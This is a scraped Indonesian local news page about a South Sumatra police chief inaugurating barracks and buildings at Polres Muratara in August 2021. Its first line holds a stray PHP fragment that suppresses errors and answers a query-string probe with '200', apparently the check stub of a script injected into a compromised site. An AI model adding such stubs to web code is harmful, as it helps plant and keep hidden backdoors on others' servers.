error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Kapolda Sumsel, Irjen Pol Prof Dr Eko Indra Heri S MM resmikan barak Baja Personel Polres Muratara dalam kunjungan Kerjanya ke Polres Muratara - SMI.COM

Home / MURATARA

Sabtu, 21 Agustus 2021 - 07:53 WIB

Kapolda Sumsel, Irjen Pol Prof Dr Eko Indra Heri S MM resmikan barak Baja Personel Polres Muratara dalam kunjungan Kerjanya ke Polres Muratara

MURATARA,SMI-

 Kamis (19/8/2021).Selain itu juga melakukan pemberian bansos kepada masyarakat dan Vaksinasi Di Polsek Karang Dapo, Kabupaten Muratara, dan dilanjutkan dengan Peresmian Gedung Mapolres Muratara, peletakan batu perrtama Masjid Al Vikry Shandy Polres Muratara serta Pemberian Penghargaan dan bantuan kepada Personil dan Masyarakat di Kabupaten Muratara.

“Kita hari ini melakukan kunjungan kerja sekaligus melakukan beberapa kegiatan tersebut, ” ujar Irjen Pol Eko didampingi Kapolres Muratara, AKBP Eko Sumaryanto, SIK.

Baca Juga :  Lira Sumsel, Empat Proyek di Muratara Diduga Rugikan Negara Hampir Rp 1 Milyar

Dirinya menjelaskan, bahwa ini agenda rutin dengan terjun langsung ke berbagai daerah untuk melihat secara langsung kondisi di lapangan. “Dalam kunjungan kita ini ada beberapa agenda termasuk peresmian barak baja Polres Muratara, pengecekan mess Polwan, penaburan bibit ikan di kolam asrama serta pengecekan taman P2L Bhayangkari,” katanya.

Baca Juga :  Jaring Aspirasi Masyarakat, Ketua DPRD Muratara :Reses Bersama Fraksi Gerindra

Selanjutnya ia dan PJU Polda Sumsel serta Kapolres Muratara melanjutkan Kunker di Polsek Karang Dapo Polres Muratara guna penandatanganan prasasti peresmian Mapolres Muratara dan pemotongan pita.

“Kita juga memberikan penghargaan dan bantuan kepada masyarakat, setelah itu kita melanjutkan kunjungan kerja ke Kota Lubuk Linggau,” tukasnya.

Share :

Baca Juga

MURATARA

Terkait Polemik Gaji TKS, Hadi Akan Panggil Dinas Terkait

MURATARA

DPRD Muratara :Tolak Raperda Pertanggung Jawaban Pelaksanaan APBD Tahun 2020

MURATARA

Musim Kemarau Tiba, Warga Desa Setia Marga Mengalami Krisis Air Bersih

MURATARA

Gagal beredar, Sat Narkoba Polres Muratara Selamatkan 8000 Jiwa

MURATARA

KPU Muratara:Tetapkan HDS – Inayatullah Sebagai Bupati Dan Wakil Terpilih

MURATARA

Ajak Masyarakat Tanam Bawang Merah, Bupati Muratara Dapat Penghargaan “Matalokal Award”, Inovator Komoditi Baru

MURATARA

Visi Misi Surian Di Sambut Baik Warga Lubuk Rumbai Baru

MURATARA

Polres Kembali Grebek Dompeng Amankan 2 Unit Genset